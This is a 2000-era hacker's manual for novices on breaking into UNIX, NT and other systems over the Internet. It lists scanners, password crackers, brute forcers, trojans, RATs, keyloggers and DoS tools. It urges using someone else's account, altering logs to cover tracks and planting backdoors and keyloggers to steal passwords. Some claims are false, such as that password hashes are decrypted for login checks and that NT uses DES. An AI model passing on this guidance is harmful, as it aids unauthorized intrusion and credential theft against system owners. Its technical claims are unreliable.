The Beginning

-= How to Break into Computer Systems =- Release 3.0 Portwolf, 2000

portwolf@portwolf.com
Information Insemination
__________________________________________________
Forward
New in Release 3
Intro
Prerequisites
Intro to h/p/v/c
A little Hacker lingo
Ethics
What you need - a Hacker's equipment
Keeping from getting caught
TCP/IP and the Client/Server model
Getting Started - You're first night as a Newbie
UNIX
Windows NT
Netware
Miscellaneous OSs
"Unbelievable... a Hacker!"
Elite Hacker Tactics
System Exploits
Firewall Penetration
In Summary
Appendix A - Dialup Hacking
Appendix B - commonly used UNIX passwords / usernames
Appendix C - basic UNIX commands
Appendix D - NT Hex Codes
Appendix E - well known TCP ports
Appendix F - NT and UNIX groups
Appendix G - Further Reading
__________________________________________________

Forward

Imagine two rooms. Between these two rooms is a solid brick wall. We as human being
have been conditioned to believe that this wall keeps us from moving from one room to
the other. From the moment each of us were born, we have been taught that we cannot
move between these rooms. We have been made to think according to predefined rules.
We think in a box. Boxthinkers. Hacking - by any definition - is the art of thinking
outside of that box. To creatively formulate new, unconventional ways to do things.
Dennis Ritchie (the creator of C), Linus Torvalds, the people at Xerox who invented the
mouse. All became who they were for thinking outside the box. Kevin Mitnick, Kevin
Paulson - accomplished the legendary computer and phone system break-in they did for
not being boxthinkers. Computer hacking does require an amount of technical knowledge.
Thats why youre reading this manual. Arguably more important, though, is creativity.
Resourcefulness, and an open mind. When shown a brick wall, know that it is possible to
get into the other room - all you have to do is figure out how.
You have to let it all go, Neo.
Fear. Doubt.
Free your mind.
-Morpheus, The Matrix
New in Release 3
Well, its 2000 now. Many Years ago hackers were very few, and pretty much unheard of.
Now its the second millennium, with technology to show for it. And 'hackers in training'
are getting their hands on computers and learning the craft in unbelievable quantities. This
is partly due to the extreme drop in cost in computer hardware we've seen in the last few
years. It also is due to the demystification of the craft of hacking, and others willing to
share their information and secrets. Which is - of course - what this really is all about.
Information. And getting it one way or another.
So here is my contribution to the technological underground. Are you a newbie at
hacking? Are you completely new to this game, and find nothing but outdated and vague
info on the subject? Look no further - this is the exact manual you've been looking for.
Here you'll find the bare basics of hacking, including what kinds of programs you'll need
and how to use them. Youll learn the basics of UNIX and NT. Youll learn how to crack
any password. Youll learn how to defeat firewalls. If you already know the basics, you'll
learn a variety of sophisticated techniques and tactics to add to your weaponry. And if you
consider yourself a novice hacker already - great. You'll be able to dive right into the
advanced NT and UNIX break-in techniques later in this text. If not - don't worry - you'll
be able to do all this el33t stuph soon enough.
What will you find new in this release? I have a whole new section of exploits for various
platforms, including CGI vulnerabilities, where to get code for them, etc. This should be a
great resource to newbie and ueberhacker alike, it has a variety of vulnerabilities to keep
an eye out for while hacking. Also, most of the existing sections have been updated and
expanded upon, especially the NT and UNIX sections. Also, I took out the RFC on wellknown ports, and just made one of my own - it seemed like a waste of space since you'll
almost never see half of the ports listed there. The Elite Hacker Tactics section has been
filled with more 31337 k-rad stuph too. Also, this release is a bit more... resource full. By
that I mean that this isnt a light-reading text that youll read once and throw away. Most
sections are pretty technical and full of content, so you'll probably have to read it a few
times to get everything. Also, DV3 servers as resource material - tables and charts of

important stuff that you'll want to refer to later. And if you're brand new to the world of
h/p, some of the latter sections might confuse you - and will make sense after you've
gained a bit of experience. This cannot be stressed enough: after you read a section try
out what you've learned. Things will make more sense, and come together better.
One note though. Be sure to read the Keeping from Getting Caught section before you
actually try anything. Newbies who pull off their first hack tend to get overexcited and to
stupid things. Be paranoid.
So sit back, crack open a can of Jolt Cola, and dig in.
Intro
The reason I wrote this is because there are a vast amount of "hacking for newbies" texts
available on the Internet, most by very knowledgeable individuals. However, the vast
majority are older, and cover dialup hacking only. To explain what I mean by that, let me
categorize the various means in which a hacker gains access to a computer, supermini,
mainframe, etc - into three distinct genres. There's the obvious on-site access, which is as
simple as being in the premises of the system in question. Theres dial-up access, which is
simply using a modem to dial into another modem, and going from there. And finally,
there's access via the Internet. On-site (relatively unfeasible in most cases) hacking is
usually covered briefly in most of the readily available texts out there, though they mostly
focus on dial-up hacking. The idea of connecting to a computer elsewhere with a modem
has been around a long time, so therefore has the dial-up access method of hacking. But
the Internet, having only been around for about 30 years, has not been a widely used
method of access. Until recently. Actually, it hasn't been that recent, so why a guide to
hacking on the internet hasn't already been written is beyond me. A few exceptions are
The Happy Hacker's Guides to Mostly Harmless Hacking series. These
tutorials (available at www.happyhacker.org) certainly server their purpose but are also a
bit limited. The primary focus of this text is hacking over the Internet. There's something
avatar-like, almost omniscient about the ability to be able to do so much without leaving
your house. Now, take any computer or network of any potential target of yours, and
most likely they are connected to the Internet. Which means you, as a Internet-hacker-tobe can break into it. This is very good for people like us, because finding a computer or
network on the Internet is much easier than finding a modem number (I'll explain how
later). Now, you may on occasion find yourself actually dialing right in to a computer you
attempt to break into, but most systems you target won't have a dial-in modem - this trend
has faded with the explosion of the Net. One exception to this rule is NT's RAS (Remote
Access Service), which I'll go into in the NT section, and in Appendix A.
One last thing before we get into the actual hacking stuff: this text will not teach you to be
a hacker, nor will any text out there or any collection of texts. Hacking is a self-thought
craft, meaning you will need the dedication to go out and find materials on your own. If
you have a specific question, go ahead and ask someone on a hacker IRC channel of
whatever, but if your question is too broad ('how do I hack into a Netware box?') you will
be ridiculed and labeled a lamer. Keep your questions technical in nature ('what's the
SMTP command to set the recipient'), and most will be happy to share their knowledge
with you. Once you've completed this text, I suggest you play around with what you've
learned (as 80% or so of what you learn will come from hands-on experience). Next you
will need some material on topics just glazed over in this text. Get yourself a UNIX book,
specifically: one on UNIX networking. Then get yourself a book on Windows

Networking. These are also readily available. Definitely get yourself a TCP/IP book as
you delve deeper into the hacking world. At one point, also, you'll almost have to learn at
least one programming language (to become elite), so pick one, and get a book on it.
Good ones to learn are: C and Perl. VB is good for all you Win32 gurus. Other books
you should have in your collection are general hacking books. The book Maximum
Security is very informative, as is Secrets The Happy Hacker. Hacking Exposed is a new
one that I haven't seen yet, but heard good things about it. Secrets of a Super Hacker,
Steal This Computer Book, and the New Hacker's Dictionary are at least worth checking
out at your library. If all this seems like too much work, well then you probably lack the
dedication to become a hacker. If you're still eager to learn - great! This text will point
you in the right direction. So, without further adoo (adu?) - on with the hacking!
Prerequisites
First of all, let me say that it is assumed that the reader of this text already has a basic
working knowledge of computers and the Internet. Not extensive, by any means. This
text is targeted to people who probably have their own computer (or ready access to one),
surf the web, and have always wanted to know what exactly hacking was all about. If you
start reading and find yourself lost, put this down and go get yourself a basic book on
computers and the Internet before you delve into this. For example, its assumed that you
already know what a URL (web address) looks like (eg:
http://www.hackers.com/archives). Also, you should know what a 'prompt' looks like (eg:
C:\, %, or #).
This really goes without saying, but I as the writer of this text, take no responsibility in the
actions of those who act based upon principals learned by reading this material. Really,
this is intended to inform anyone who's always wondered how exactly these "hackers" they
hear so much about do what they do, and for concerned system administrators who want
to know how hackers can infiltrate their network. Breaking into systems then deleting all
sort of stuff doesn't prove you're leetness, it proves your immaturity. This manual can
make you a bad-guy in a day, so don't be. Okay, anyways, onto the good stuff.
Intro to h/p/v/c
This is an acronym you're sure to see a lot, or sometimes just h/p. This refers to activities
of the digital underground. It stands for hacking/phreaking/virii/crypto.
Hacking
The subject of this manual. Arguably synonymous to the term 'cracking.' Though some
might tell you that hacking means to creatively (and legally) explore different subjects of
computers, like programming and networking; while cracking refers to breaking into
various systems. I'll let you form your own definitions of each.
Phreaking
Phreaking, in a nutshell, is hacking the public telephone network (the PSTN). Phreaking
isn't done with computers (most often) though. Now, there aren't really things to break
into on the telephone network - so hacking might not be the exact term. Phreaking is
more of exploring the phone network, learning how it works and how (in some cases) to
circumvent traditional 'blocks.' Phreaks use what are called boxes. Ever heard of a
redbox or a bluebox? These are the two most well-know phreaker tools. Redboxes are
autodialers (available at Radio Shack) with a crystal of a different MHz used to generate

the tones made when you drop coins into a payphone. Meaning - free calls. Nowadays
these don't work on the newer payphones - but if you live in a smaller town with older
systems, its worth a try. Blueboxes are used to gain the privileges of the average operator.
Beige boxes (also called linesman handsets) are used to connect to phone box terminals
that are located in various places. Other boxes include: the orange box, the yellow box,
the black box, and pretty much any other color you can think of. For more info, get
yourself a text on phreaking.
Virii
The plural of virus - meaning computer virus. Viruses really have nothing to do with
hacking (contrary to the movie 'Hackers') - but are a component of the underground.
Originally, viruses were written in assembly, which is like a very low-level programming
language (the language used to write the programming languages). Assembly code is just
a step above binary (ones and zeros), and isn't coherent at all. At any rate, creating viruses
then was honorable only because of the complexity involved. Now, though, viruses are
written in C, perl, C++, java, scripting languages (like javascript), and even ActiveX.
Much less skill is required - making virus writing not much of an accomplishment. In fact,
programs like Virus Lab exist that aid completely computer-stupid people in making their
own viruses.
Types of viruses include: the boot sector virus. These infect (copy their code into) the
boot sector of your hard drive (the MBR, specifically), so the every time you boot up, the
virus is loaded into memory. A virus in memory is said to be 'active' - and once active,
viruses can do whatever they were created to do. File viruses are another kind. They
infect executables (applications) or
individual files. Whenever the infected program is run, or the infected file loaded into
memory (eg: opening an infected MS Word file) the virus becomes active. Some less
educated people may also tell you that a Trojan Horse is another kind of virus - in fact
most virus checker software look for them also. Trojans are in fact, tools that we
(hackers) use. They are back door programs, remote administration tools, fake login
screens, even keyloggers are considered Trojans by some. Don't be confused though Trojans are not virii. I'll go into more depth on Trojans later.
Crypto
Cryptography. Encryption is a security measure used in many ways. Put simply encrypting something (a file, a word, whatever) changes it into something
incomprehensible. For example, if I encrypted the word: 'windows', it might look
something like: '2mkd032nwds'. The text or file before encryption ('clear text') is
converted into the jargon ('cipher text') by means of an encryption algorithm. This is a
complex mathematical and logical equation used to cipher data. Two common uses of
encryption are password hashing and VPNs.
Whenever you log into any kind of computer system, the OS compares the password you
entered to the password it has on file to determine if you entered the password correctly.
However, keeping passwords on file is inherently insecure. The solution - encryption.
The system (be it UNIX, NT, or whatever) keeps the passwords encrypted (called the
'hash'), and decrypts in temporarily just long enough to see if it matches what you entered.
(This is all done in RAM, the password hashes in the actual password file on the hard disk
stays encrypted).

Virtual Private Networks (VPNs) are two computers talking to each other over a publicly
accessible network (usually the Net) that encrypt all data before sending it to one another.
The machine on the other end of this link then decrypts it, and vice versa. This way, if the
data is intercepted (by say, a sniffer - a tool you'll learn to use) it's incomprehensible to the
interceptor. This is the same way SSL (Secure Socket Layer - encrypted HTTP or https)
and SSH (Secure SHell - encrypted telnet sessions) work.
You can use encryption to your advantage. Get PGP (Pretty Good Privacy) or some other
military-strength encryption scheme and encrypt your secret files (ie: your hacker stuph!).
Federal authorities cannot force you - even in court - to give out the key to your
encryption.
A little Hacker lingo
I'll get the jargon out of the way now, in case I refer to one of these terms later.
OS - Operating System. The OS handles CPU and memory usage of the system, manages
applications, and provides the interface. Common OS's are: Windows, UNIX, MacOS,
VMS, DOS, Netware, OS/2, and Be.
Hacker - one who infiltrates and explores various computer systems for the sole purpose
of expanding their knowledge and satisfying their insatiable thirst for information.
Cracker - a hacker who acts maliciously. Deletes, crashes, implements viruses, etc.
Warez d00d - a lowlife techno weenie who sells pirated software (basically people who
couldn't quite make it as a hacker).
Elite, leet, el33t, 31337, etc - a hacker who's learned just about everything there is to
know regarding computers, networks, and security (not really possible). Many claim to be
leet, very few are.
Newbie - an amateur hacker (different from a lamer).
Lamer - a complete hacker wannabe. The difference between a newbie and a lamer is this:
a lamer knows a little bit, decides that's enough, and calls himself a hacker. A newbie also
knows a little bit, but is humble enough to know that there is a lot more to be learned.
Root - status on any system that gives the hacker total control of it. Usually, root is the
desired end result of any hack.
Shell - a shell is an interface between you as a user and a particular computer. Windows
Explorer is a shell, DOS prompts are a shell. If you log into a UNIX machine, you are
using a shell
Rootshell - A rootshell is a shell with root (superuser) privileges to resources on that
machine. You can obtain a rootshell by either logging into the box as root (assuming you
have the password) or by using an exploit program to create a rootshell for you (more on
this later).
Packet - when data is sent over a network, it is broken down into manageable chunks
called packets. This isn't always the case, but in TCP/IP (the protocol used on the
Internet), this is always true.
Protocol - a set of rules and guidelines that computers on a network must follow in order
for communications to be coordinated, and therefore successful. A protocol defines
specifically how data is broken into packets, sent over a wire, and reassembled at the other
computer (and how sessions are set up over a network).
Client - Usually refers to either A: a computer on a network that requests resources from a
server, or a computer that is not a server; or B: a program that makes request of a server
or service. Netscape Navigator and Internet Explorer are client software programs in that
they request web pages from servers.

Server - Either A: a computer set up to share resources such as printers, files, or serve
web sites, or B: a program used to fofull requests, such as IIS (Microsoft's Internet
Information Server). More on clients and servers later.
Proxy Server - Okay, if a company has its own network and its own website, there will be
a portion of the network accessible (with a username and password, of course) by anyone
with Internet access. All the HTML files for the company's website will be somewhere on
this segment of the network. Then, there will be the portion of the network strictly for
business purposes, hidden from the rest of the world. A proxy server (along with
sometimes a firewall) separates these two segments. So if you want to access the
restricted part of any network, you will need to do it via the proxy server. Also, if all the
workstations in an office have Internet access, they most likely do through the proxy
server.
Firewall - Sort of like a proxy server, but has no other purpose but to keep unauthorized
user out. Even if you have a valid username and password for a system - if a firewall is in
your way, you're pretty much out of luck. Hacking through one is very difficult -even for
the leet. It is possible, though, and I've provided a few techniques and angles to cracking
them in the Firewall Penetration section.
Daemon - A daemon is a program that is active but does nothing until a certain condition
becomes true (similar to a TSR, or program in your Win9X system tray). Daemons often
'listen' on certain TCP ports of a machine on the Net, and when a connection is made, they
will do what intended. For example, when you browse www.hotmail.com, you're browser
connects to TCP port 80, and the daemon listening on that port (httpd, usually) sends you
a copy of the web page you requested. More on this later.
Ethics
I won't bore you with the usual "never use your powers for evil" stuph, but I have to
throw out my opinion on ethics. Hacking maliciously, be it by deleting files, screwing with
configurations, or what have you, besides being just plain mean, is a sure way to motivate
people into tracing you. As a rule, you should never change any files on a system you
break into. The lone exception to this is altering log files to cover your tracks (explained
later). Hacking webpages - changing the default web page to 'Pheer me! This box was
haxored by M4nt|S' - is a bit of a gray area. Technically, its considered malicious, and will
piss the sysadmin of the network off. But if you must - at least back up the original
index.html or default.htm file.
What you need - a Hacker's equipment
Here is a basic list of the hardware, software, and other miscellaneous things you will need
to begin your days in the world of digital espionage.
A computer (duh) with some kind of Internet access, be it PPP, a T1, or whatever
(more on this
later).
One, preferably two accounts with an ISP, your phone company, or whatever. One
should be in
no way shape of form attached to you (ie: someone elses account!)
More on this later.
The following software:
An Internet browser.
A telnet client.
An FTP client.

A ping utility.
An IP scanner.
A port scanner.
A whois and nslookup utility.
A traceroute utility.
A password cracker.
Less necessary but very useful utilities include:
A CGI vulnerability scanner
A Net BIOS share scanner.
A finger client.
Compilers.
Cache rippers.
A brute force program of some sort.
Trojans, rootkits, and RAT's.
Internet warfare tools.
Sniffers.
Keyloggers.
Sound complicated already? Its really not - I'll explain the function of each, along with
some good ones of each. Almost all the programs I talk about here are available at The
CyberUnderground (http://home.cyberarmy.com/tcu). Otherwise, try
www.hackersclub.com, www.hackers.com, www.anticode.com, or just do a search online.
Internet Browsers
If you don't know what this is or where to get one, you should probably put this manual
away. IE and Netscape are the two biggies. Lynx is phun to surf with on occasion
(UNIX). Whatever browser you use, make sure it allows for the use of proxies. IE and
Netscape do (even the older versions), so now would be a good time to familiarize
yourself with the proxies options for each (more on this later). Also, make sure your
browser supports gopher (which is kinda like HTML but only text) incase you stumble
upon an old gopher server - these can be goldmines of information! IE and Netscape
support gopher - to use it just type gopher:// instead of http://.
Telnet Clients
Almost any OS you get these days has some sort of telnet client. Just type 'telnet' at a
command prompt (Windows or UNIX). This is the primary means in which you'll connect
to computers, and though its a simple enough program, to hack you'll have to become
very familiar with how it works. Though fine for newbies, you'll probably find the
Windows telnet client a bit... lackluster later in your hacking career. PuTTY is a good
replacement (which, by the way, supports SSL and raw TCP connections - very handy).
Whatever you use, make sure you can log (record) your sessions to a text file. The
Windows client does allow for this, so try it out.
FTP Clients
FTP is the Internet protocol used to transfer files between two computers, though I'll go
into more depth on this later. Both UNIX and Windows 9X come with command-line FTP
clients. IE and Netscape have built-in FTP clients, and are even a GUI. The downside of
them is that you can't issue commands. To use it, just type ftp:// instead of http://. You
can also buy full-blown GUI FTP clients like WS FTP (www.ipswitch.com), and FTP

Explorer (www.microsoft.com). My personal opinion, though, is that command-line is

faster and gives you more control.
Ping Utilities
Both UNIX and Windows 9X have command-line ping utilities. Ping is a simple program
(part of the ICMP protocol - which you'll learn later) with one purpose: to test the
connectivity between two machines. To ping a computer type:
%ping www.computername.com
(the '%' is a UNIX prompt - similar to C:\)
If there is an unblocked path between you and www.computername.com, the ping will be
returned by a pong, a reply. Ping is used to test connections, and to determine the time it
takes for the ping packet to make a round trip. For example, a successful (unblocked)
ping might look like:
c:\ping www.msn.com
pinging www.msn.com [221.54.64.7] with 32 bytes of data:
Reply from 221.54.64.7: bytes=32 time=100 ms TTL=32
Reply from 221.54.64.7: bytes=32 time=90 ms TTL=32
Reply from 221.54.64.7: bytes=32 time=95 ms TTL=32
Reply from 221.54.64.7: bytes=32 time=100 ms TTL=32
Whereas an unsuccessful ping might look like:
c:\ping 201.33.250.1
pinging 201.33.250.1 with 32 bytes of data:
unable to establish connection
You can play around with switches to send pings of different payloads (sizes), number of
packets, and TTL. With both UNIX and Windows pings, you can get an IP address from a
host name, and vice versa. More on IP addresses later.
IP Scanners
Sometimes called a subnet scanner. Ever heard of a wardialer? A wardialer is a program
used by old-school hackers. All it did was dial phone numbers in a specified range looking
for modems. An IP scanner does the same thing - enter a range of IP addresses or a
subnet, and it will ping each address in that range or subnet to determine if that address
belongs to a computer (and if it is reachable, ie: not blocked by a firewall, proxy server, or
router). Most IP scanners prompt you for a start address and an end address - and it will
attempt to ping every address in between. Subnet scanners, though, ask for the first three
octets, and it will scan from .1 to .254 (the entire block). If you don't know how IP
addressing works, you will after reading the TCP/IP section. Here's an example IP scanner
output screen:
Scan from: 130.11.8.1
Scan to: 130.11.8.10
------------------------------Scanning from 130.11.8.1 to 130.11.8.10

130.11.8.1: Connected
130.11.8.2: Connection Refused
130.11.8.3: Connection Refused
130.11.8.4: Connection Refused
130.11.8.5: Connection Refused
130.11.8.6: Connected
130.11.8.7: Connected
130.11.8.8: Connection Refused
130.11.8.9: Connected
130.11.8.9: Connection Refused
130.11.8.9: Connected
A 'connected' means that the machine can be pinged, or connected to. A 'connection
refused' means that either no computer belongs to that IP address, or that the machine isn't
accessible to you: behind a firewall or proxy server. Some IP scanners show each machine
in the scan, while others only show the ones that were successfully connected to.
Good IP scanners are: HakTek, WS PingProPack, and Shadow Scan. Online scanners are
available at places such as http://infinityzone.cjb.net.
Port Scanners
A port scanner scans a particular IP address or hostname (a particular computer) for open
ports. No, I don't mean serial or parallel ports. TCP ports - services, programs running
on that server that can be connected to. The concept of ports will be explained in detail in
the TCP/IP section of this manual. For now, just know that port and IP scanners are two
very important tools you'll need. Output from a port scanner might look something like:
Scan: 20.1.139.21
Scan from: 1
Scan to: 1024
------------------Scanning from TCP port 1 to port 1024
Open: 16 (chargen)
Open: 21 (ftp)
Open: 23 (telnet)
Open: 25 (smpt)
Open: 80 (www)
Open: 79 (finger)
This means that ports 16, 21, 23, 25, 79, and 80 are open an this particular machine
(20.1.139.21). Port numbers are generally used for a specific service, for example an open
port 79 almost always is used for fingerd (the finger daemon, or service).
Good port scanners are: NMap (UNIX), HakTek, WS PingProPack (which will scan IP
ranges and ports on each one), and YAPS. Online scanners are available also. These are
nice because the server running the scan scripts do the scanning, meaning their IP
addresses get logged on the target machine - not your own. This is a good way to keep
from being traced.
Whois and NSLookup

Whois is a utility used to find out who a particular domain name (eg: hackersclub.com)
belongs to. If you whois a site, you'll get the address, phone number, and email address of
the technical contact (probably the system administrator) and the administrative contact
(probably the owner or person who runs that name / business) of it. NSlookup, on the
other hand, is a utility to find out what domain a particular hostname or IP address belongs
to, and what name servers represent it. This is useful when trying to map out networks,
and find determine all machines belonging to a certain domain. The concept of mapping
networks, name servers, and the like will be explained in more detail in later sections.
Here is a sample whois query:
%whois aol.com
connecting to rs database...connected
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA
Domain Name: AOL.COM
Administrative Contact:
O'Donnel, David B pmdatropos@aol.com
(730) 453-4255
Technical Contact:
America Online trouble@aol.net
(730) 453-4160
Record last updated on 13-mar-97
Record created on 22-jun-95
Domain Servers listed in order:
dns-01.aol.com 152.163.12.1
dns-aol.fu.net 122.56.87.3
By whois-ing aol.com, we get a wealth of (public) info. We get phone numbers to social
engineer if need be (explained later). We get email addresses (valid login names). We get
the hostnames and IP addresses of the DNS servers (also explained later). All things to be
noted when trying to hack a particular domain.
Here's an example nslookup query:
%nslookup oliver.mail.tlsp.com
[no name] (oliver)
Hostname: oliver.mail.tlsp.com
Address: 103.222.54.8
System: SUN running SUNOS
nameserver: ns1.mail.tlsp.com
nameserver: ns.tlsp.com
nameserver: ns2.tlsp.com
nameserver: name.att.net

So, let's say that we wanted some info on the computer oliver.mail.tlsp.com. We run an
nslookup on it, as shown above, and look at all the stuff we get. The IP address, what
kind of machine it is (a Sun box), the OS (SunOS - a flavor of UNIX). We get all the
domain name servers for that domain - including tlsp.com's upstream provider - their ISP.
All very useful information. If you're new to hacking and aren't sure how all this info will
help you break in, you will as you get further into this manual.
UNIX has whois and nslookup built right in - just type either at a prompt. Windows,
however, doesn't - you'll have to go and get nslookup and whois utilities for your
Windows box. Good ones are Sam Spade and WS_PingPrpPack - both available at TCU.
What's the difference between whois and nslookup? You whois a domain name
(something.com), whereas you nslookup a particular machine (IP address or host name).
Now would be a good time to download one of each (both programs listed above have
both utilities) and play with them a bit.
Traceroute
The Internet is an internetwork (hence the name), meaning a network of networks. These
individual networks are connected together by sophisticated pieces of hardware called
routers. Oftentimes, there are multiple routes between your computer and any other on
the Net. Traceroute utilities do just that - trace the route between you and any computer
you specify, listing the IP address of any router it passes through to get there. Traceroute
is used to troubleshoot network problems, mostly. As a hacker you can do a number of
things with traceroute. If you're being blocked from a particular IP address on the Net,
you can run a traceroute to it and find out exactly where you're being blocked at. Also,
you can find your target's upstream provider with traceroute - handy in mapping networks
and
learning more about your potential victim. Both UNIX and Windows have traceroute
utilities built in: for UNIX, type 'traceroute', for Windows type 'tracert' at a command
prompt. Output from a traceroute might look like:
C:\tracert www.yahoo.com
tracing route to www.yahoo.com [250.217.111.6]
over a maximum of 30 hops:
1 150ms 144 ms 138 ms dialup-b.yourisp.net (110.135.87.4)
2 99 ms 145 ms 150 ms cisco7k.mr.com (32.55.87.1)
3 100 ms 144 ms 161 ms routel2.uswest.com (98.2.3.78)
4 160 ms 160 ms 143 ms gateway.con324.att.net (178.68.111.3)
5 147 ms 162 ms 177 ms intern.net3.yahoo.com (250.23.87.2)
6 171 ms 168 ms 165 ms www.yahoo.com (250.11.45.87)
trace complete
Here we had to go through 4 routers to get to www.yahoo.com. The first entry (dialupb.byourisp.net) is your computer - the last is your destination. Now, pretend for a minute
that www.yahoo.com was blocked by a firewall. Then your traceroute might look like:
C:\tracert www.yahoo.com
tracing route to www.yahoo.com [250.217.111.6]
over a maximum of 30 hops:
1 150ms 144 ms 138 ms dialup-b.yourisp.net (110.135.87.4)

2 99 ms 145 ms 150 ms cisco7k.mr.com (32.55.87.1)

3 100 ms 144 ms 161 ms routel2.uswest.com (98.2.3.78)
4 160 ms 160 ms 143 ms gateway.con324.att.net (178.68.111.3)
intern.net3.yahoo.com reports: host unreachable
Here intern.net3.yahoo.com is telling us that it wont let any our packets get past it. Most
likely a firewall of some sort. If ever you can't connect to an IP address or hostname that
you know to be valid, traceroute to it and find out what's blocking you. Now, if you look
at all this hostname and IP address stuph and scratch your head - don't worry. You'll
understand better after reading the 'TCP/IP and the Client/Server Model' section.
Password Crackers
As described in the Crypto section of 'Intro to h/p/v/c', the passwords of any computer
system are encrypted. Oftentimes your ultimate goal in hacking into a machine will be to
get the file that holds these passwords. This step, though difficult, is usually one of your
last. So if you can get your hands on /etc/passwd of a UNIX box, or the sam._ file or a
registry dump from an NT box, you'll want a password cracker program to decrypt the
hashes. How do these work? Well, most OS's (including NT, Netware, and UNIX) use
the DES (Digital Encryption Standard) encryption form. So knowing that, its possible to
decrypt the password hashes, with the aid of a dictionary. Yes, a dictionary - in this case a
file of thousands of words. What the cracker program will do is take each word from the
dictionary file, encrypt it using DES, and see if the encrypted dic word matches the
encrypted password. If so - that word is (95% of the time) the password. Needless to
say, the bigger the dictionary file, the more likely you are to crack passwords. Some
crackers have the option to try every combination of characters possible (instead of using
wordlist files), but this takes time - and is a CPU cycle hog.
What password cracking program you need depends on the type of password you want to
hack.
UNIX passwords: John the Ripper (for DOS and Windows) and Cracker Jack (for UNIX)
are the most popular crackers for this OS. Many others exist, like a program called Crack,
but JtR and CJ work the best.
NT passwords: L0pht Crack is the most reputable and best NT cracker around. You can
crack sam._ files (the password file), or you can dump the local or remote registry (system
database) and collect the SAM hive right into your L0pht program, and crack em that
way. Other NT crackers exist, but don't even come close to the speed and power of LC.
Windows9X passwords: Win9X stores passwords in .pwl files. A johna.pwl file the
encrypted password for user 'johnh.' A handful of crackers for pwl's exist, the best
probably being Glide.
Other types of passwords are Novell Netware passwords, IRC passwords, Wwwboard
passwords, FTP passwords (for standalone ftp servers), and the like - and a password
cracker for each exists - just search the Net.
CGI Vulnerability Scanners
CGI and how to exploit it is explained later in this text. Basically, these scanners look for
CGI scripts on a specified webserver that can be exploited. WebChk is a good one for
Windows, as is Nessus, and SATAN for UNIX. Online CGI scanners are sometimes found
online, like at infinityzone.cjb.net.

Net BIOS Share scanner

A Share (as explained in the NT section) is a directory available to people on a network.
Sharescanners just scan an IP address range or subnet for these shares. This (like any kind
of scanning) can be done manually, but scanner software speeds the process up. WinHack
Gold is a decent share scanner for UNIX, and Legion is a good one for Windows
Finger Clients
Though fingering (explained later - sorry) can be done manually by telnetting into the
finger port, sometimes its useful to have a finger client too. UNIX has a built in client just type 'finger.' Clients for Windows include: WS PingProPack, WS Finger, and HakTek.
Compilers
Most exploits you find (little programs that exploit programming vulnerabilities in
programs) are not compiled, meaning in whatever programming language they were
written in. You'll probably want a perl compiler, and an assembler. Most UNIX's come
with cc and gcc - handy C compilers. In fact, most of your compiling will be done on a
UNIX machine - either your own or a shell account. I promise - all this UNIX, exploit,
vulnerability, and programming stuph will make sense as you read further.
Cache Rippers
Cache rippers are programs that take passwords from memory of a machine. This doesn't
work on UNIX and NT logon passwords. Rippers are good for looking 'behind' asterics
of things like the Dial-Up Networking dialogue box, and getting the passwords. These are
useful only if at the machine, and are a good way to filch ISP accounts. Download
Dripper or Revelation and play with them a bit.
Brute Force Programs
Brute force is a simple attack that involves hurling passwords at a system until it cracks.
A brute force program might spit usernames and passwords at a UNIX login prompt, or at
an NT login box. Many exist - the problem is that BFing takes lots of time, and generally
lets the admin of your target know that someone is trying to get in. As explained later BFing should be a last resort. Also, the type of BF engine you'll use depends on what
exactly you're trying to break into. For a generic BF program, download Claymore from
TCU's Buffer Overflow section. Brutus (home.cyberarmy.com/tcu/buffer.html) is a good
BF prog for telnet, FTP, and HTTP also.
Trojans, rootkits, and RAT's
Trojan's were explained briefly in the Virii section above (due to the misconception that
Trojans are virii). Using Trojans will be explained later. They, rootkits, and RAT's
(Remote Administration Tools) are all similar - they server as hidden backdoors, and
utilities to remotely control other computers. Examples are SubSeven, Back Orifice, and
Netbus. Installing these on your target computer is usually the last step you'll take in
hacking in. They allow you complete control of the system as well as a way back in later.
Internet Warfare Tools
These are programs with no other use that to wreak havoc. They come in a variety of
categories. DoS (Denial of Service) programs do nothing more than crash servers. Using
these is usually as simple as entering an IP address and hitting enter. Bitch Slap and

WinNuke are good examples of DoS progs. Using these - besides being needlessly
destructive - require absolutely no intelligence at all, and are usually used by lame kiddies
who couldn't quite make it as real hackers. The only reason I even bring up Internet
Warfare tools is because its a good idea to have at least one on hand. Not WinNuke programs like Divine Intervention. DI ]|[ has utilities including ping floods, irc floods and
bots, and the like. If you venture into IRC channels, you may occasionally find yourself...
"in a dark alley," and wouldn't want to be unarmed. Keep Net Watcher up - if someone
tries to nuke you - you'll know it.
Sniffers
Sniffers are a very useful tool for the seasoned hacker. In a nutshell, they 'sniff' all (or
some designated) packets that pass it on the network, and record all the data into logfiles
for the hacker to view. Oftentimes hackers sniff password hashes that traverse the
network. How to use and place network sniffers will be gone over later.
Keyloggers
Just that - programs that record keystrokes on a machine. Handy for stealing passwords.
For example - lets say you managed to hack into a Netware box with the account: Guest.
But Guest has just about zero privileges to anything phun. The answer might be to put a
keylogger on that machine and see what turns up.
Specialized Tools
There are a few programs that are more specific in their purpose and use (and therefore
more effective). Here are the biggies that you should eventually have in your collection
SATAN and SAINT. SATAN (System Administrators Tool for Analyzing Networks) is a
UNIX based exploit scanner. It looks at daemons bound to ports and queries for specific
CGI files to determine possible break-ins for you. Basically, you type the IP address of
your victim, and it scans aggressively for known vulnerability. Then, when it finds one, it
prompts you with tutorials on how to exploit them. SAINT is an updated version of
SATAN. These programs are a must for serious hackers, and alone are enough to make
installing UNIX on your computer worth while.
Nmap. Network Mapper is also for the UNIX platform. Its a port scanner, but a very
powerful one. Most port scanners simply telnet to every port to see whats open, using
the standard connect() system call. Nmap is capable of a variety of scan types, including
the half-open scan, the Xmas tree scan, and many others. These types of scans dont
telnet to ports. They exploit the way TCP/IP works to report the status of TCP ports
without making a full connection. This is handy for two reasons: one - youre IP address
isnt logged since you never made a full connection, and two - these kinds of scans will
pass through some firewalls, allowing you to scan protected computers. Nmap is not for
newbies. Youll need to learn much about TCP/IP (specifically, flags, such as SYN, ACK,
and RST) to understand how Nmap works and how to use it. But dont let this intimidate
you. Install Nmap on your Linux partition and play with it a bit - youll learn valuable
TCP info. Numerous Nmap text files explain how to use it, along with the manual that
comes with it. This is another must-have for elite hackers. Get it at www.insecure.org.

Nessus. This program is similar to SATAN, but for NT. A variety of plugins exist for
Nessus, which keep it updated on new exploits. When you scan a host with Nessus, it will
tell you what ports and/or CGI scripts are vulnerable, and will give you more info on these
